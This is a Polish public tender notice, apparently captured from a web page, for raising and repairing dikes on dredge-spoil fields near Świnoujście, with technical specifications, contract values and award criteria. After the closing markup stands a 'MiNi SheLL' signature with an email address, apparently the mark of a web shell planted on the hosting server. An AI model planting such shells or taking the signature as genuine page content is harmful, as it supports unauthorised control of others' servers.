Dojazd do obiektu:Tylko drogą wodną torem wodnym Świnoujście - Szczecin do miejsca cumowania na wysokości nabrzeża HUKZamawiający nie zapewnia transportu jakiegokolwiek sprzętu budowlanego, materiałów, potencjału ludzkiego itp. potrzebnego do wykonania zakresu zadania. Zamawiający nie zapewnia również dostępu do mediów, miejsca schronienia dla sprzętu i mienia oraz ochrony, Wykonawcy w czasie wykonywania zleconych prac.3)	Zakres zamówienia obejmuje:Roboty budowlane, które należy wykonać podczas modernizacji wału południowego okalających kwaterę południową, polegać będą na wykonaniu robót ziemnych na istniejącym wale. Istniejący wał pola refulacyjnego Dębina ma szerokości korony około 1,5m - 2.5 m i wysokości od 2,0 m od 2,7 m. Nie ma możliwości minięcia się ciężkiego sprzętu budowlanego.Długość wałów okalających kwaterę południową pokazuje inwentaryzacja geodezyjna stanowiąca załącznik nr 8 do SIWZ.Roboty ziemne po wcześniejszym wytyczeniu, należy prowadzić w sposób liniowy zaczynając od końca wału (uzupełnienie ziemią do zakładanej wysokości korony wału podniesionej w stosunku do rzeczywistej o 1,0 m oraz profilowanie korony i skarpy wału), przesuwając się w kierunku początku zakresu zadania. W pierwszej kolejności należy ułożyć geotkaninę pasami równolegle do osi korony wału, Zakład na geotkaninie powinien być nie mniejszy niż 0,5 m. Odległość miedzy szpilkami nie większa niż 0,5 m. Przy podstawie skarpy od strony kwatery, należy na rozłożoną i zaszpilkowaną geotkaninę ułożyć dwie warstwy worków jutowych wypełnionych piaskiem, które będą stanowić dodatkowe zabezpieczenie podstawy stopy skarpy. Geotkanina musi być wywinięta na koronę wału i zachodzić co najmniej na pół szerokości korony wału. Geotkanina powinna spełniać warunek : wytrzymałość na rozciąganie wzdłuż i wszerz min 150 kN/m2. Na tak przygotowane wzmocnione wały należy rozpocząć roboty ziemne, polegające na podwyższeniu korony wałów. Szerokość korony wału nie może być mniejsza niż 2,0 m (tak aby umożliwić przejazd sprzętu ciężkiego po koronie wału). Materiał ziemny należy pozyskać w części - z gruntu dowiezionego z ukopu(około 300-400 mb, bezpośrednio z kwatery północnej) oddalonego od miejsca wbudowania, przewidziana ilość około 700 m3 oraz w części z gruntu bezpośrednio z ukopu z kwatery wzdłuż podnoszonego wału.Na bieżąco należy wzdłuż podnoszonego wału prowadzić prace związane z odmulaniem rowu opaskowego. Przewidywana długość rowu do odmulenia - około 1200 mb.Przedmiar robót stanowiący Załącznik nr 9 do SIWZ stanowi jedynie wartość pomocniczą do wyceny ryczałtowej wykonania zadania podniesienia rzędnej wysokościowej wałów. Każdy potencjalny wykonawca sam jest zobowiązany przed przystąpieniem do przetargu zapoznać się z terenem jak też wykonać pomiar terenowy w celu dokładnego określenia zakresu rzeczowego wykonania prac do założonych przez Zamawiającego parametrów technicznych.Należy przewidzieć sprzęt koparkowy o odpowiednim wysięgu oraz ewentualnie przewidzieć sprzęt typu spycharka do przemieszczania urobku z pola refulacyjnego pod wał okalający kwaterę.W zakres prac wchodzi również oczyszczenie przepustów stalowych oraz remont kładek podejściowych do mnichów.Po zakończeniu prac modernizacyjnych wałów należy sporządzić inwentaryzację wysokościową , pokazującego szerokość i wysokość korony wałów.Prace będą wykonywane na terenie o torfowym podłożu, oddalonym od siedzib ludzkich. Prace należy prowadzić stosując przepisy zasad bhp. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.4)	Wymagania dotyczące wykonania zamówieniaWykonawca zobowiązany jest do przestrzegania przepisów dotyczących ochrony przyrody, w tym ustawy z dnia 16 kwietnia 2004 r o ochronie przyrody (Dz. U. z 2015 r. poz.1651 wraz z późn. zmianami),Prace należy prowadzić stosując przepisy zasady bhp szczególne w zakresie wykonania i odbioru robót ziemnych, robót umocnieniowych, melioracyjnych oraz leśnych. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.Wykonawca musi dysponować osobami, które będą uczestniczyć w realizacji zamówienia, które zostały przeszkolone w zakresie bhp przy tego rodzaju pracach zgodnie z treścią rozporządzenia Ministra Środowiska z 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny przy wykonywaniu prac z zakresu gospodarki leśnej (Dz. U. nr 161, poz. 1141).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45247200-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 124473,10<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-05-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Bieżące utrzymanie wałów na kwaterach pola refulacyjnego D</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część B - Bieżące utrzymanie wałów na kwaterach pola refulacyjnego D1)	Lokalizacja : Pole D zlokalizowane jest na działce 417/1 przy południowym cyplu wyspy Uznam, rozciąga się wzdłuż toru wodnego Świnoujście - Szczecin, od km14,00 do km 15,800, po zachodniej stronie Kanału Piastowskiego. Przeznaczone jest dla odkładania urobku z pogłębiania toru wodnego od km 0,00 do km 32,00.2)	Dojazd do obiektu:drogą wodną - torem wodnym Świnoujście - Szczecin do miejsca cumowania przy przystani dla refulera, lub drogą leśną od m. Karsibórz i dalej wzdłuż Kanału Piastowskiego w kierunku południowym, do falochronów wyjściowych na Zalew Szczeciński. Przejazd przez drogę leśną należy uzgodnić z Nadleśnictwem Międzyzdroje.Zamawiający nie zapewnia dostępu do mediów, miejsca schronienia mienia Wykonawcy, ochrony, w czasie wykonywania zleconych prac.3)	Ogólny zakres prac przewidzianych do wykonania:Roboty budowlane, które należy wykonać podczas modernizacji - przeformowania wału, polegać będą na wykonaniu robót ziemnych na istniejącym wale. Istniejący wał pola refulacyjnego D ma szerokości korony około 2,0 m - 2.5 m i wysokości od 2,0 m od 4,0 m. Nie ma możliwości minięcia się ciężkiego sprzętu budowlanego.Roboty ziemne po wcześniejszym wytyczeniu i wstępnym wyprofilowaniu skarpy należy prowadzić w sposób liniowy zaczynając od jednego z końców wału (uzupełnienie ziemią do istniejącej wysokości korony wału oraz profilowanie korony i skarpy wału), przesuwając się w kierunku drugiego z końców. W pierwszej kolejności należy ułożyć geotkaninę pasami prostopadle do osi korony wału. Zakład na geotkaninie powinien być nie mniejszy niż 0,5 m. Odległość miedzy szpilkami nie większa niż 0,5 m. Przy podstawie skarpy od strony naprawianej skarpy, należy na rozłożoną i zaszpilkowaną geotkaninę ułożyć dwie warstwy worków jutowych wypełnionych piaskiem, które będą stanowić dodatkowe zabezpieczenie podstawy stopy skarpy. Geotkanina musi być wywinięta na koronę wału i zachodzić co najmniej na 3/4 szerokości korony wału. Geotkanina powinna spełniać warunek : wytrzymałość na rozciąganie wzdłuż i wszerz min 150 kN/m2. Na tak przygotowane wzmocnione wały należy rozpocząć roboty ziemne, polegające na przeformowaniu i uzupełnieniu skarpy i korony wałów poprzez nasypanie na geotkaninę warstwy o grubości min 1,0 m. Szerokość korony wału należy odtworzyć do stanu istniejącego. Wał należy przeformować o 3-4 m w kierunku kwatery. Przewiduje się, iż w miejscu naprawy wału rzędna korony może być podniesiona o miąszność warstwy ułożonej na geotkaninie. Materiał ziemny należy pozyskać z ukopu z kwatery wzdłuż podnoszonego wału oraz należy przewidzieć przemieszczenie w razie braku materiału ziemnego poprzez przepchnięcie lub ukopanie urobku z odległości do 70 mb wzdłuż osi naprawianego wału.Do zakresu prac należy również miejscowe uzupełnienie urobkiem ziemnym wyrw na wałach, które powstały w skutek ingerencji zwierzyny występującej licznie na tym terenie.Do zakresu prac należy również wybudowanie nowego wału o wysokości 2,0 m i szerokości w koronie 2,5m na odcinku 150 mb. Materiał gruntowy należy pozyskać bezpośrednio z ukopu a w razie braku z przepchnięcia mas ziemnych z kwatery przy której zostanie wybudowany wał.Przedmiar robót stanowiący Załącznik nr 10 do SIWZ stanowi jedynie wartość pomocniczą do wyceny ryczałtowej wykonania zadania podniesienia rzędnej wysokościowej wałów. Każdy potencjalny wykonawca sam jest zobowiązany przed przystąpieniem do przetargu zapoznać się z terenem jak też wykonać pomiar terenowy w celu dokładnego określenia zakresu rzeczowego wykonania prac do założonych przez Zamawiającego parametrów technicznych.Należy przewidzieć sprzęt koparkowy o odpowiednim wysięgu oraz ewentualnie przewidzieć sprzęt typu spycharka do przemieszczania urobku z pola refulacyjnego pod wał okalający kwaterę.Prace będą wykonywane na terenie o torfowym i bagnistym podłożu, oddalonym od siedzib ludzkich. Prace należy prowadzić stosując przepisy zasad bhp. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.4)	Wymagania dotyczące wykonania zamówieniaW związku z tym, że pole refulacyjne D leży w bezpośrednim sąsiedztwie rezerwatu przyrody, Wykonawca zobowiązany jest do przestrzegania przepisów dotyczących ochrony przyrody , m. in. :a)	ustawy z dnia 16 kwietnia 2004 r o ochronie przyrody (Dz. U. z 2009 r. Nr 151, poz.1220; wraz z późn. zmianami),b)	Rozporządzenia nr 117/2006 Wojewody Zachodniopomorskiego z dnia 29 października 2007 r. w sprawie rezerwatu przyrody Karsiborskie Paprocie (Dz. Urz. Województwa Zachodniopomorskiego nr 108, poz. 1862).Prace będą wykonywane w terenie oddalonym od siedzib ludzkich na terenie gdzie występuje niestabilne podłoże gruntowe.Prace należy prowadzić stosując przepisy i zasady bhp szczególnie w zakresie wykonania i odbioru robót ziemnych, robót umocnieniowych, melioracyjnych oraz leśnych. Ponadto wykonawca winien zapewnić odpowiednie środki zabezpieczenia i łączności bezprzewodowej.Wykonawca musi dysponować osobami, które będą uczestniczyć w realizacji zamówienia, które zostały przeszkolone w zakresie bhp przy tego rodzaju pracach.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45247200-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 97034,25<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-06-15<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie kierownika budowy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com